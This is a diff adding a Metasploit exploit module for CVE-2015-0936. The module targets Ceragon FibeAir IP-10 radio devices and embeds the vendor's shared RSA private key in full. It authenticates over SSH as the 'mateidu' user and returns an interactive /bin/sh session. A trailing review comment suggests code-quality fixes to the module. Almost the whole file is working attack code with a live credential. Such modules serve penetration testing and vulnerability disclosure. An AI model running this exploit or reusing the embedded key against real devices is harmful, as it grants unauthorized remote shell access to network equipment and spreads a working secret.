| 1 | +## |
| 2 | +# This module requires Metasploit: http://metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +require 'msf/core' |
| 7 | +require 'net/ssh' |
| 8 | + |
| 9 | +class Metasploit3 < Msf::Exploit::Remote |
| 10 | + include Msf::Auxiliary::Report |
| 11 | + |
| 12 | + Rank = ExcellentRanking |
| 13 | + |
| 14 | + def initialize(info = {}) |
| 15 | + super(update_info(info, { |
| 16 | + 'Name' => 'Ceragon FibeAir IP-10 SSH Private Key Exposure', |
| 17 | + 'Description' => %q{ |
| 18 | + Ceragon ships a public/private key pair on FibeAir IP-10 devices |
| 19 | + that allows passwordless authentication to any other IP-10 device. |
| 20 | + Since the key is easily retrievable, an attacker can use it to |
| 21 | + gain unauthorized remote access as the "mateidu" user. |
| 22 | + }, |
| 23 | + 'Platform' => 'unix', |
| 24 | + 'Arch' => ARCH_CMD, |
| 25 | + 'Privileged' => true, |
| 26 | + 'Targets' => [ [ "Universal", {} ] ], |
| 27 | + 'Payload' => |
| 28 | + { |
| 29 | + 'Compat' => { |
| 30 | + 'PayloadType' => 'cmd_interact', |
| 31 | + 'ConnectionType' => 'find', |
| 32 | + }, |
| 33 | + }, |
| 34 | + 'Author' => [ |
| 35 | + 'hdm', # Discovery |
| 36 | + 'todb' # Metasploit module and advisory text (mostly copy-paste) |
| 37 | + ], |
| 38 | + 'License' => MSF_LICENSE, |
| 39 | + 'References' => |
| 40 | + [ |
| 41 | + ['CVE', '2015-0936'], |
| 42 | + ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure |
| 43 | + ['URL', 'hdm.io/blog/2015/01/20/partial-disclosure-is-annoying'] # Related issue with hardcoded user:pass |
| 44 | + ], |
| 45 | + 'DisclosureDate' => "Apr 01 2015", # Not a joke |
| 46 | + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, |
| 47 | + 'DefaultTarget' => 0 |
| 48 | + })) |
| 49 | + |
| 50 | + register_options( |
| 51 | + [ |
| 52 | + # Since we don't include Tcp, we have to register this manually |
| 53 | + Opt::RHOST(), |
| 54 | + Opt::RPORT(22) |
| 55 | + ], self.class |
| 56 | + ) |
| 57 | + |
| 58 | + register_advanced_options( |
| 59 | + [ |
| 60 | + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), |
| 61 | + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) |
| 62 | + ] |
| 63 | + ) |
| 64 | + |
| 65 | + end |
| 66 | + |
| 67 | + # helper methods that normally come from Tcp |
| 68 | + def rhost |
| 69 | + datastore['RHOST'] |
| 70 | + end |
| 71 | + def rport |
| 72 | + datastore['RPORT'] |
| 73 | + end |
| 74 | + |
| 75 | + def do_login(user) |
| 76 | + opt_hash = { |
| 77 | + :auth_methods => ['publickey'], |
| 78 | + :msframework => framework, |
| 79 | + :msfmodule => self, |
| 80 | + :port => rport, |
| 81 | + :key_data => [ key_data ], |
| 82 | + :disable_agent => true, |
| 83 | + :config => false, |
| 84 | + :record_auth_info => true, |
| 85 | + :proxies => datastore['Proxies'] |
| 86 | + } |
| 87 | + opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] |
| 88 | + begin |
| 89 | + ssh_socket = nil |
| 90 | + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do |
| 91 | + ssh_socket = Net::SSH.start(rhost, user, opt_hash) |
| 92 | + end |
| 93 | + rescue Rex::ConnectionError |
| 94 | + return nil |
| 95 | + rescue Net::SSH::Disconnect, ::EOFError |
| 96 | + print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" |
| 97 | + return nil |
| 98 | + rescue ::Timeout::Error |
| 99 | + print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" |
| 100 | + return nil |
| 101 | + rescue Net::SSH::AuthenticationFailed |
| 102 | + print_error "#{rhost}:#{rport} SSH - Failed authentication" |
| 103 | + return nil |
| 104 | + rescue Net::SSH::Exception => e |
| 105 | + print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" |
| 106 | + return nil |
| 107 | + end |
| 108 | + |
| 109 | + if ssh_socket |
| 110 | + |
| 111 | + # Create a new session from the socket, then dump it. |
| 112 | + conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) |
| 113 | + ssh_socket = nil |
| 114 | + |
| 115 | + return conn |
| 116 | + else |
| 117 | + return nil |
| 118 | + end |
| 119 | + end |
| 120 | + |
| 121 | + def exploit |
| 122 | + conn = do_login("mateidu") |
| 123 | + if conn |
| 124 | + print_good "#{rhost}:#{rport} - Successful login" |
| 125 | + handler(conn.lsock) |
| 126 | + end |
| 127 | + end |
| 128 | + |
| 129 | + def key_data |
| 130 | + <<EOF |
| 131 | +-----BEGIN RSA PRIVATE KEY----- |
| 132 | +MIICWwIBAAKBgQDBEh0OUdoiplc0P+XW8VPu57etz8O9eHbLHkQW27EZBEdXEYxr |
| 133 | +MOFXi+PkA0ZcNDBRgjSJmHpo5WsPLwj/L3/L5gMYK+yeqsNu48ONbbqzZsFdaBQ+ |
| 134 | +IL3dPdMDovYo7GFVyXuaWMQ4hgAJEc+kk1hUaGKcLENQf0vEyt01eA/k6QIBIwKB |
| 135 | +gQCwhZbohVm5R6AvxWRsv2KuiraQSO16B70ResHpA2AW31crCLrlqQiKjoc23mw3 |
| 136 | +CyTcztDy1I0stH8j0zts+DpSbYZnWKSb5hxhl/w96yNYPUJaTatgcPB46xOBDsgv |
| 137 | +4Lf4GGt3gsQFvuTUArIf6MCJiUn4AQA9Q96QyCH/g4mdiwJBAPHdYgTDiQcpUAbY |
| 138 | +SanIpq7XFeKXBPgRbAN57fTwzWVDyFHwvVUrpqc+SSwfzhsaNpE3IpLD9RqOyEr6 |
| 139 | +B8YrC2UCQQDMWrUeNQsf6xQer2AKw2Q06bTAicetJWz5O8CF2mcpVFYc1VJMkiuV |
| 140 | +93gCvQORq4dpApJYZxhigY4k/f46BlU1AkAbpEW3Zs3U7sdRPUo/SiGtlOyO7LAc |
| 141 | +WcMzmOf+vG8+xesCDOJwIj7uisaIsy1/cLXHdAPzhBwDCQDyoDtnGty7AkEAnaUP |
| 142 | +YHIP5Ww0F6vcYBMSybuaEN9Q5KfXuPOUhIPpLoLjWBJGzVrRKou0WeJElPIJX6Ll |
| 143 | +7GzJqxN8SGwqhIiK3wJAOQ2Hm068EicG5WQoS+8+KIE/SVHWmFDvet+f1vgDchvT |
| 144 | +uPa5zx2eZ2rxP1pXHAdBSgh799hCF60eZZtlWnNqLg== |
| 145 | +-----END RSA PRIVATE KEY----- |
| 146 | +EOF |
| 147 | + end |
| 148 | +end |
| 149 | + |
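Review bot: The `rescue Rex::ConnectionError` branch in `do_login` returns nil without printing anything, so a refused or unreachable host produces no output at all, while every other rescue branch in the same method reports why the login did not happen; change it to `rescue Rex::ConnectionError => e` / `print_error "#{rhost}:#{rport} SSH - Connection failed: #{e.message}"` / `return nil` so the operator can tell a network failure from a silent module. Relatedly, `:proxies => datastore['Proxies']` reads an option this module never registers (the comment above `Opt::RHOST()` notes that Tcp is not included, and only RHOST and RPORT are added), so Proxies is nil unless set globally and does not appear in `show options`; registering `Opt::Proxies()` next to `Opt::RPORT(22)` would fix that. Finally, `'Privileged' => true` asserts that a session as "mateidu" is privileged, which nothing in the module or its Description substantiates — worth confirming on the device or noting in the Description what level of access the key actually grants.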